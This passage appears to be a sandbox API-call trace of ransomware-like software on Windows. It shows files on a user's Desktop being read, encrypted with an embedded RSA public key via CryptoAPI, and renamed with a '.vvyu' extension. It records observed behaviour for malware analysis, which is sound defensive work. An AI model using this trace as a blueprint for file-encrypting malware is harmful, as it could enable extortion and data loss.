[0188.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae26e0 | out: hHeap=0x2c0000) returned 1 [0188.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeabd8 | out: hHeap=0x2c0000) returned 1 [0188.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.480] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x6d28, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x6d28, lpOverlapped=0x0) returned 1 [0188.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.481] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6d2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.481] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.483] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.483] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.483] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.483] CloseHandle (hObject=0x584) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af1f88 [0188.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.485] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Rwzd9mw.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\rwzd9mw.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\Rwzd9mw.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\rwzd9mw.mp4.vvyu")) returned 1 [0188.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.488] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.491] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f708690, ftCreationTime.dwHighDateTime=0x1d8a48d, ftLastAccessTime.dwLowDateTime=0x5e31fa40, ftLastAccessTime.dwHighDateTime=0x1d8a614, ftLastWriteTime.dwLowDateTime=0x5e31fa40, ftLastWriteTime.dwHighDateTime=0x1d8a614, nFileSizeHigh=0x0, nFileSizeLow=0x1357e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U00H4oegdjWIv9LIU5.png", cAlternateFileName="U00H4O~1.PNG")) returned 1 [0188.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae26e0 [0188.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0188.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae26e0 | out: hHeap=0x2c0000) returned 1 [0188.492] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\U00H4oegdjWIv9LIU5.png") returned=".png" [0188.492] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\U00H4oegdjWIv9LIU5.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\u00h4oegdjwiv9liu5.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.492] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=79230) returned 1 [0188.492] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.496] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13558, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.496] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.498] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.498] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1357e, lpOverlapped=0x0) returned 1 [0188.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.499] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.499] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.500] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.500] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.500] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.500] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.500] GetLastError () returned 0x0 [0188.500] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.500] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.501] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.501] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.501] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13580) returned 0x2af5168 [0188.502] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae26e0 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2728 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.503] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0188.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d970 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d958 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.507] GetCurrentThreadId () returned 0x5d8 [0188.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee5c0 [0188.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.508] GetCurrentThreadId () returned 0x5d8 [0188.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9b8 [0188.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d970 [0188.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9d0 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9e8 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d988 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d958 [0188.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 